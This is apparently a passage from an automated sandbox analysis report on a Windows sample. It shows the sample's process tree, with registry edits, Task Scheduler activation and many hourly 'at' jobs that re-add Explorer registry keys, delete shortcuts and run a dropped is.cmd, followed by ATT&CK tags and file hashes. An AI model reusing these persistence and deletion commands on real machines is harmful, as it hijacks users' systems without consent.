      REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
      4⤵
      PID:3820
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\copy.cmd
    3⤵
    - Drops file in Program Files directory
    PID:1432
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\run.cmd
    3⤵
    PID:1708
  - - C:\Windows\SysWOW64\sc.exe
      sc config Schedule start= auto
      4⤵
      Launches sc.exe
      PID:3504
  - - C:\Windows\SysWOW64\net.exe
      net start "Task Scheduler"
      4⤵
      PID:4288
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start "Task Scheduler"
        5⤵
        
        PID:4616
  - - C:\Windows\SysWOW64\at.exe
      at 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:4972
  - - C:\Windows\SysWOW64\at.exe
      at 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:852
  - - C:\Windows\SysWOW64\at.exe
      at 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:3556
  - - C:\Windows\SysWOW64\at.exe
      at 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:3500
  - - C:\Windows\SysWOW64\at.exe
      at 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:2916
  - - C:\Windows\SysWOW64\at.exe
      at 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:920
  - - C:\Windows\SysWOW64\at.exe
      at 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:4344
  - - C:\Windows\SysWOW64\at.exe
      at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:3120
  - - C:\Windows\SysWOW64\at.exe
      at 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:4364
  - - C:\Windows\SysWOW64\at.exe
      at 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:4624
  - - C:\Windows\SysWOW64\at.exe
      at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:1664
  - - C:\Windows\SysWOW64\at.exe
      at 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:2492
  - - C:\Windows\SysWOW64\at.exe
      at 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:3312
  - - C:\Windows\SysWOW64\at.exe
      at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:2072
  - - C:\Windows\SysWOW64\at.exe
      at 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:3160
  - - C:\Windows\SysWOW64\at.exe
      at 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:4420
  - - C:\Windows\SysWOW64\at.exe
      at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:4388
  - - C:\Windows\SysWOW64\at.exe
      at 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:2316
  - - C:\Windows\SysWOW64\at.exe
      at 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:4440
  - - C:\Windows\SysWOW64\at.exe
      at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:5052
  - - C:\Windows\SysWOW64\at.exe
      at 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:3632
  - - C:\Windows\SysWOW64\at.exe
      at 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:388
  - - C:\Windows\SysWOW64\at.exe
      at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:2796
  - - C:\Windows\SysWOW64\at.exe
      at 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:4360
  - - C:\Windows\SysWOW64\at.exe
      at 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:4112
  - - C:\Windows\SysWOW64\at.exe
      at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:736
  - - C:\Windows\SysWOW64\at.exe
      at 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:2052
  - - C:\Windows\SysWOW64\at.exe
      at 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:868
  - - C:\Windows\SysWOW64\at.exe
      at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:872
  - - C:\Windows\SysWOW64\at.exe
      at 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:3476
  - - C:\Windows\SysWOW64\at.exe
      at 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2420
  - - C:\Windows\SysWOW64\at.exe
      at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:3376
  - - C:\Windows\SysWOW64\at.exe
      at 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:4704
  - - C:\Windows\SysWOW64\at.exe
      at 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:3260
  - - C:\Windows\SysWOW64\at.exe
      at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:440
  - - C:\Windows\SysWOW64\at.exe
      at 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:3920
  - - C:\Windows\SysWOW64\at.exe
      at 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:3076
  - - C:\Windows\SysWOW64\at.exe
      at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:2576
  - - C:\Windows\SysWOW64\at.exe
      at 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:3400
  - - C:\Windows\SysWOW64\at.exe
      at 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:3972
  - - C:\Windows\SysWOW64\at.exe
      at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:4068
  - - C:\Windows\SysWOW64\at.exe
      at 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:2860
  - - C:\Windows\SysWOW64\at.exe
      at 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:4144
  - - C:\Windows\SysWOW64\at.exe
      at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:732
  - - C:\Windows\SysWOW64\at.exe
      at 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:1636
  - - C:\Windows\SysWOW64\at.exe
      at 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:4900
  - - C:\Windows\SysWOW64\at.exe
      at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:4908
  - - C:\Windows\SysWOW64\at.exe
      at 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:1732
  - - C:\Windows\SysWOW64\at.exe
      at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:3996
  - - C:\Windows\SysWOW64\at.exe
      at 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:2636
  - - C:\Windows\SysWOW64\at.exe
      at 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:4280
  - - C:\Windows\SysWOW64\at.exe
      at 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*└└*.*"
      4⤵
      PID:1524
  - - C:\Windows\SysWOW64\at.exe
      at 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*└└*.*"
      4⤵
      PID:1604
  - - C:\Windows\SysWOW64\at.exe
      at 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdls\is.cmd
      4⤵
      PID:1356
  - - C:\Windows\SysWOW64\at.exe
      at 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:2740
  - - C:\Windows\SysWOW64\at.exe
      at 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*└└*.*"
      4⤵
      PID:1680
  - - C:\Windows\SysWOW64\at.exe
      at 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*└└*.*"
      4⤵
      PID:5084
  - - C:\Windows\SysWOW64\at.exe
      at 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdls\is.cmd
      4⤵
      PID:4960
  - - C:\Windows\SysWOW64\at.exe
      at 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*└└*.*"
      4⤵
      PID:1060
  - - C:\Windows\SysWOW64\at.exe
      at 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*└└*.*"
      4⤵
      PID:2936
  - - C:\Windows\SysWOW64\at.exe
      at 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*└└*.*"
      4⤵
      PID:4936
  - - C:\Windows\SysWOW64\at.exe
      at 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdls\is.cmd
      4⤵
      PID:1204
  - - C:\Windows\SysWOW64\at.exe
      at 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*└└*.*"
      4⤵
      PID:4192
  - - C:\Windows\SysWOW64\at.exe
      at 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*└└*.*"
      4⤵
      PID:1864
  - - C:\Windows\SysWOW64\at.exe
      at 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*└└*.*"
      4⤵
      PID:3624
  - - C:\Windows\SysWOW64\at.exe
      at 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdls\is.cmd
      4⤵
      PID:5076
  - - C:\Windows\SysWOW64\at.exe
      at 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*└└*.*"
      4⤵
      PID:2016
  - - C:\Windows\SysWOW64\at.exe
      at 9:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
      4⤵
      PID:4052
  - - C:\Windows\SysWOW64\at.exe
      at 14:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
      4⤵
      PID:1552
  - - C:\Windows\SysWOW64\at.exe
      at 18:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
      4⤵
      PID:1776
  - - C:\Windows\SysWOW64\at.exe
      at 21:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
      4⤵
      PID:4336

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\361.cmd

Filesize
1KB

MD5
2621fc7053aa3d34d8216327d92f5445

SHA1
550cbca926154543ead3c474d6feb7e3346933dd

SHA256
5b824fdc1593ff8da084df3dd0102bc4133e91ce90de46be15f661111ad9bff8

SHA512
e80fd9d2232d9456337ab5c7c626d6d4339ab123d3aa8e5d116f2dda5784fd82056b27de888f8459dcd2f83c4b95d84a88768831b59b5e6abb2fca4ab7056990

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7xdown.vbs

Filesize
334B

MD5
ebecf7e7ab396f7d3befc5b1beaa1698

SHA1
fc7504d29bafdbcf2057ce06fc1ac8d37b306071

SHA256
0bbea4b97fa47f10fcaff80f1233850e2d077d0355d4dc0faa75690e8ef9d2de

SHA512
a51fa5dcdff77340d0dfedc67b6e1ed467a57d1a96680d565acbd7f163dc5141a87f1df54ebc96340349f186bf2dbc600f7e4f5a96a95ee1df004be76a0e6901

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\copy.cmd

Filesize
271B

MD5
79479b9b40967c6bbc24009b58c42a99

SHA1
3429c87085b28f5ff01fc20a471f2a6788b176ba

SHA256
9ffe68e158702dab33e8f577dd3c495b232f03f1fbeb6c98dd72985cfa9e3994

SHA512
9d5da82de10f23150a85e838f4fa549a255b6a0d9795c2a3d31fffae115177f0e5df028bdd07240adb464ebd488cbbdc27bdb64e18b6dceb742b6ac98581bd5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\is.cmd

Filesize
99B

MD5
0470728c8fecaef349dda7299ed76e14

SHA1
b000979a137b7c2170b77abe5a6ef4d3902064a3

SHA256
e53a206f477a91c49f506efdbb2dbeb594d3f5bbf23ac9aedc569ddc3427c0a2

SHA512
8780dd5879f2c3f13f7712a0ebd92415844836293f5ced5500b4dc7471549f162b8277647e4f5243e197457fc2a3ed71fed3f4fa87bca9ff8724aafe14a26f21

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.cmd

Filesize
11KB

MD5
78128b79ee47844a39bc8b6a8eae5b9f

SHA1
0c4a0827270e0498d240a25a4cc445a3f1828d92

SHA256
52f3f8b761db5b156a3285f4bb34883f993f9f0d449c4c687b15c5f40f6d2ab8

SHA512
f4981d2cfe08028a764d600f3023e46ddb338a3a0083bf5c0b7ac01709e12defc821f753ef31431a4c2f9b82b064ec36829dafef498f489cc091820d0a49d85d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\to.cmd

Filesize
3KB

MD5
0ebfdd6ce52cd28aff0aba4432375c1f

SHA1
0f583b89f37e0f1b10a23f4e7a90121a2e783706

SHA256
6e8c00dc480136d970b98f60962b926b03d16d2606cbe3bd5e7a0d4bd61ab373

SHA512
7ad6ea2eaff9b400044b10b3ea17881e4b0ba5ce38c8c3c11cd5d701a558821159cd3660706cc06ccaf36d1388817eaffa8fd6d5f9f2dbe52c61f14b6480892d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\winare.vbs

Filesize
695B

MD5
fbce8f5de4086b94666402d2e13739cb

SHA1
6bba41c928ed4267e516f3e369471d926e3ae104

SHA256
5a9df2479fcd1eb5bbdf1c65e0d1aec95e4223bd83dae9775c621ccc47997dd2

SHA512
6bcd9bd51f9a131f98506b60aa2c0edc7d6ff1f01257227dd58988b9a78f7454daab4ed1fc94520ba09eea99602b29d357ad44efc3409255cb997da24f33d46f

Download Submit